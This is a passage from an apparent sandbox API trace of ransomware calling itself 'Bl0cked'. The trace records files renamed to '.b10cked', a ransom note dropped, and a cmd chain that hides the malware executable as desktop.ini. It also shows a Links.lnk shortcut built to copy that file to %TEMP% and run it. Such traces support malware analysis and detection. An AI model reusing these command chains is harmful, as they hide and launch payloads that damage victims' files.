lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0210.354] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xe2 [0210.355] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0210.355] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0210.355] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0210.355] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xe2 [0210.355] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0210.355] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0210.355] ReadFile (in: hFile=0x120, lpBuffer=0x12fb5e8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12fb5e8*, lpNumberOfBytesRead=0x12ec08*=0x70, lpOverlapped=0x0) returned 1 [0210.356] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0210.356] WriteFile (in: hFile=0x120, lpBuffer=0x12fb5e8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12fb5e8*, lpNumberOfBytesWritten=0x12ec1c*=0x70, lpOverlapped=0x0) returned 1 [0210.357] SetFilePointer (in: hFile=0x120, lDistanceToMove=-112, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x72 [0210.357] ReadFile (in: hFile=0x120, lpBuffer=0x12fb5e8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12fb5e8*, lpNumberOfBytesRead=0x12ec08*=0x70, lpOverlapped=0x0) returned 1 [0210.357] SetFilePointer (in: hFile=0x120, lDistanceToMove=-112, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x72 [0210.357] WriteFile (in: hFile=0x120, lpBuffer=0x12fb5e8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12fb5e8*, lpNumberOfBytesWritten=0x12ec1c*=0x70, lpOverlapped=0x0) returned 1 [0210.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Web Slice Gallery.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0210.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Web Slice Gallery.url", cchWideChar=21, lpMultiByteStr=0x13286a4, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 
| out: lpMultiByteStr="Web Slice Gallery.url", lpUsedDefaultChar=0x0) returned 21 [0210.362] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xe2 [0210.362] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0210.363] CloseHandle (hObject=0x120) returned 1 [0210.364] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL") returned 0x2c [0210.364] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Links\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\Links\\") returned 0x20 [0210.365] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x748, dwThreadId=0x114)) returned 1 [0210.366] 
CloseHandle (hObject=0x1b4) returned 1 [0210.366] CloseHandle (hObject=0x120) returned 1 [0210.367] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Links\\", cchLength=0x21 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\LINKS\\") returned 0x21 [0210.367] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\DEFAULT\\CONTACTS\\") returned 0x1a [0210.367] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\LINKS\\", cchCount1=33, lpString2="C:\\USERS\\DEFAULT\\CONTACTS\\", cchCount2=26) returned 3 [0210.367] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Links\\", cchLength=0x21 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\LINKS\\") returned 0x21 [0210.367] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0210.367] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\LINKS\\", cchCount1=33, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0210.367] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0210.367] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0210.367] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0210.367] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Links\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\Links\\") returned 0x20 [0210.367] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > 
\"[TO_PATH]\"") returned 0x42 [0210.367] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0210.367] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x370, dwThreadId=0x938)) returned 1 [0210.560] CloseHandle (hObject=0x1b4) returned 1 [0210.560] CloseHandle (hObject=0x120) returned 1 [0210.560] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\links\\bl0cked-readme.rtf")) returned 0xffffffff [0210.560] GetLastError () returned 0x2 [0210.560] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\Default\\Favorites\\Links\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\links\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0210.563] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\links\\bl0cked-readme.rtf")) returned 0x20 [0210.563] 
CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0210.563] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0210.563] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0210.563] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0210.563] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0210.564] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0210.564] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0210.564] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Links\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\Links\\") returned 0x20 [0210.564] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0210.564] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 
0x9 [0210.564] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Links", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\Links") returned 0x1f [0210.564] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x13a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\DEFAULT\\FAVORI~1\\LINKS\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\DEFAULT\\FAVORI~1\\LINKS\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\DEFAULT\\FAVORI~1\\LINKS\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\DEFAULT\\FAVORI~1\\LINKS\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x13a [0210.564] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0210.564] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, 
hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x9ac, dwThreadId=0x9bc)) returned 1 [0210.572] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0211.686] CloseHandle (hObject=0x120) returned 1 [0211.687] CloseHandle (hObject=0x1b4) returned 1 [0211.687] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0211.687] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0211.687] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0211.687] GetTickCount () returned 0x3b643 [0211.687] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=26847612918) returned 1 [0211.687] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x54\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0211.687] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x52\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0211.687] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: 
lpWideCharStr="\x71\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0211.687] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0211.687] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x76\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0211.687] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0211.687] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x70\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0211.687] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x64\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0211.687] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0211.687] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0211.687] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0211.687] CharUpperBuffW (in: lpsz="explorer.exe \"Links\" & type \"Links\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && 
\"%TEMP%\\[EXE_NAME]\"", cchLength=0x5b | out: lpsz="EXPLORER.EXE \"LINKS\" & TYPE \"LINKS\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5b [0211.687] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0211.687] CharUpperBuffW (in: lpsz="explorer.exe \"Links\" & type \"Links\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5c | out: lpsz="EXPLORER.EXE \"LINKS\" & TYPE \"LINKS\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5c [0211.687] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0211.687] CoInitialize (pvReserved=0x0) returned 0x0 [0211.688] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0211.689] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0211.689] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0211.689] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0211.690] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Links\" & type \"Links\\desktop.ini\" > \"%TEMP%\\TRqJvnpd.exe\" && \"%TEMP%\\TRqJvnpd.exe\"") returned 0x0 [0211.690] 
ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0211.690] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0211.690] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0211.690] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\Default\\Favorites\\Links.lnk", fRemember=0) returned 0x0 [0211.697] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0211.697] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0211.697] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0211.697] CoUninitialize () [0211.697] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0211.697] ReleaseMutex (hMutex=0xf8) returned 1 [0211.697] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0211.697] ReleaseMutex (hMutex=0xf8) returned 1 [0211.697] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0211.698] ReleaseMutex (hMutex=0xf8) returned 1 [0211.698] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0211.698] ReleaseMutex (hMutex=0xf8) returned 1 [0211.698] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0211.699] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.699] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.699] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
